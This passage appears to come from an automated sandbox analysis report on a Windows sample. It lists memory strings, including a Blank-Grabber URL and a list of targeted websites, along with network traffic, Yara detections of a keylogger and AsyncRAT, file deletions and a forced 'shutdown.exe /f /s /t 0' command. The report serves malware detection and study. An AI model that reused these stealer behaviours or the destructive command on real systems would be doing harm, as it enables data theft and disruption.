Source: svchost.exe, 00000020.00000003.1849613191.000002224F072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000033.00000002.1942613111.000001F226496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000033.00000002.1942613111.000001F226496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: sB2ClgrGng.exe, 00000001.00000003.1781323039.00000281AB969000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1769284741.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1769626278.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1777343894.00000281AB962000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1769914240.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189456125.00000281ABB20000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1770763715.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.dr	String found in binary or memory: https://peps.python.org/pep-0205/
Source: sB2ClgrGng.exe, 00000001.00000002.2197225283.00007FFDFB442000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: sB2ClgrGng.exe, 00000001.00000002.2188979517.00000281AB820000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source: sB2ClgrGng.exe, 00000001.00000002.2188979517.00000281AB820000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngp_U
Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281AC03E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1893801082.00000281AC03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824674501.00000281AC0BC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1823342722.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1827778807.00000281AC0F1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281AC033000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: sB2ClgrGng.exe, 00000001.00000003.1824674501.00000281AC0BC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1827778807.00000281AC0F1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824469466.00000281AC9E4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF4C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164621490.00000281ACBF5000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031411910.00000281ACBF4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF4C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBD1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF4C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164621490.00000281ACBF5000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031411910.00000281ACBF4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF4C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBD1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1919277034.00000281ABA74000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1829116745.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1900869577.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABA73000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: sB2ClgrGng.exe, 00000001.00000003.1784156958.00000281ABEF0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA0F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189091027.00000281ABA0F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784156958.00000281ABEE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: sB2ClgrGng.exe, 00000001.00000002.2188821100.00000281AB619000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC3E4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: sB2ClgrGng.exe, 00000001.00000002.2191571952.00000281AC220000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.ca/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC3E4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281AC03E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9A0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC48C000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2185827911.00000281AC9D1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2029909133.00000281ACD93000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC330000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABE58000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1893801082.00000281AC03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: sB2ClgrGng.exe, 00000001.00000003.1824376723.00000281ABADD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2032780608.00000281ABADD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824674501.00000281AC0BC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1894030317.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1827778807.00000281AC0F1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1919277034.00000281ABA74000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1900869577.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824674501.00000281AC0BC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1823342722.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1827778807.00000281AC0F1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281AC033000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: sB2ClgrGng.exe, 00000001.00000003.1824674501.00000281AC0BC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1827778807.00000281AC0F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABA73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824674501.00000281AC0BC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1827778807.00000281AC0F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
Source: sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1854259026.00000281AC9EE000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1887470881.00000281AC9EB000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9EE000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824065198.00000281AC9EE000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1897588274.00000281AC9EE000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189091027.00000281AB920000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872068738.00000281AC9EA000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: sB2ClgrGng.exe, 00000001.00000003.2165800360.00000281AC9C6000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC53C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2196648212.00007FFDFAEA0000.00000004.00000001.01000000.0000000F.sdmp, sB2ClgrGng.exe, 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2197225283.00007FFDFB546000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.python.org/psf/license/
Source: sB2ClgrGng.exe, 00000001.00000002.2197225283.00007FFDFB442000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.python.org/psf/license/)
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC3E4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49738 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Python Keylogger

Source: Yara match

File source: Process Memory Space: sB2ClgrGng.exe PID: 2892, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\CURQNKVOIX.mp3	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\LTKMYBSEYZ.docx	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\VAMYDFPUND.png	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\CURQNKVOIX.jpg	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\CURQNKVOIX.jpg	Jump to behavior

Source: cmd.exe

Process created: 59

System Summary

Malicious sample detected (through community Yara rule)

Source: 15.0.bound.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\word.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Uses shutdown.exe to shutdown or reboot the system

Source: C:\Users\user\AppData\Local\Temp\bound.exe

Process created: C:\Windows\System32\shutdown.exe shutdown.exe /f /s /t 0

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Source: C:\Users\user\AppData\Local\Temp\bound.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe

Code function: 84_2_00007FF71F0B3A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,

84_2_00007FF71F0B3A70

Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe

Code function: 84_2_00007FF71F0DB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,

84_2_00007FF71F0DB57C

Source: C:\Windows\System32\svchost.exe

